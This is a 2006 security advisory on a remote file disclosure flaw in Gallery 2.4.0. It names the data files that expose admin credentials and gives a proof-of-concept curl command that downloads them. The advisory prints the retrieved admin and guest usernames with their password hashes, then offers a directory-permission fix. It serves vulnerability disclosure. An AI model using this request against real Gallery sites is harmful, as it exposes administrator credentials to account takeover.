gallery 2.4.0 suffers from a remote file disclosure vulnerability.
c657bd9378dc6bd3199c13287d6a1dc9cde66ac1668c32892977cef0d954162a
-----------------------------------------------------
Advisory id: FLS:004
Author: Federico Fazzi
Date: 08/06/2006, 1:04
Sinthesis: gallery 2.4.0 full, remote file disclosure
Type: low
Product: http://gallery.menalto.com/
Patch: unavailable
-----------------------------------------------------
1) Description:
The installation of gallery write installation log file
and .inc file, where are registered login and password
of master account, the login is in plain-text the instead
the password is an encrypted md5. It the positions of
criticals files,
/g2data/Installog-*.txt
/g2data/cache/entity/0/0/*.inc
Now if you want, you can get all file and read the data
of master, and others.
2) Proof of concept:
curl "http://example/gallery2/g2data/cache/entity/0/0/[1-2].inc" -o
"#1.data"
(note: thats numbers of *.inc are random!)
reading these files:
1.inc
--
modules/core/classes/GalleryUser.class|O:11:"GalleryUser":15:{s:9:"_userName";s:5:"guest";s:9:"_fullName";s:5:"Guest";s:15:"_hashedPassword";s:36:"e\Pj15d716b24485cd6f53f71ceaf9e965fb";s:6:"_email";N;s:9:"_language";N;s:3:"_id";i:5;s:18:"_creationTimestamp";i:1149727740;s:11:"_isLinkable";i:0;s:7:"_linkId";N;s:13:"_linkedEntity";N;s:22:"_modificationTimestamp";i:1149727740;s:13:"_serialNumber";i:1;s:11:"_entityType";s:11:"GalleryUser";s:15:"_onLoadHandlers";N;s:17:"_persistentStatus";O:8:"stdClass":3:{s:5:"flags";i:0;s:8:"modified";a:0:{}s:13:"originalValue";a:0:{}}}
--
2.inc
--
modules/core/classes/GalleryUser.class|O:11:"GalleryUser":15:{s:9:"_userName";s:5:"admin";s:9:"_fullName";s:21:"Gallery
Administrator";s:15:"_hashedPassword";s:36:"6d`qd1f78da8e31fe86f714fe9370ec25c9a";s:6:"_email";s:10:"test@test.it";s:9:"_language";N;s:3:"_id";i:6;s:18:"_creationTimestamp";i:1149727740;s:11:"_isLinkable";i:0;s:7:"_linkId";N;s:13:"_linkedEntity";N;s:22:"_modificationTimestamp";i:1149727740;s:13:"_serialNumber";i:1;s:11:"_entityType";s:11:"GalleryUser";s:15:"_onLoadHandlers";N;s:17:"_persistentStatus";O:8:"stdClass":3:{s:5:"flags";i:0;s:8:"modified";a:0:{}s:13:"originalValue";a:0:{}}}
--
we have discovered some information of guest account
and master account, reassumed:
Name of admin: "Guest" / "Gallery Administrator"
Name of account: "guest" / "admin"
Password of account (md5encrypt): "e\Pj15d716b24485cd6f53f71ceaf9e965fb" /
"6d`qd1f78da8e31fe86f714fe9370ec25c9a"
Mail addr: "test@test.it"
3) Solution:
Apply the permission of directories and files into g2data/
(-rwx-----x)
chmod 701 g2data/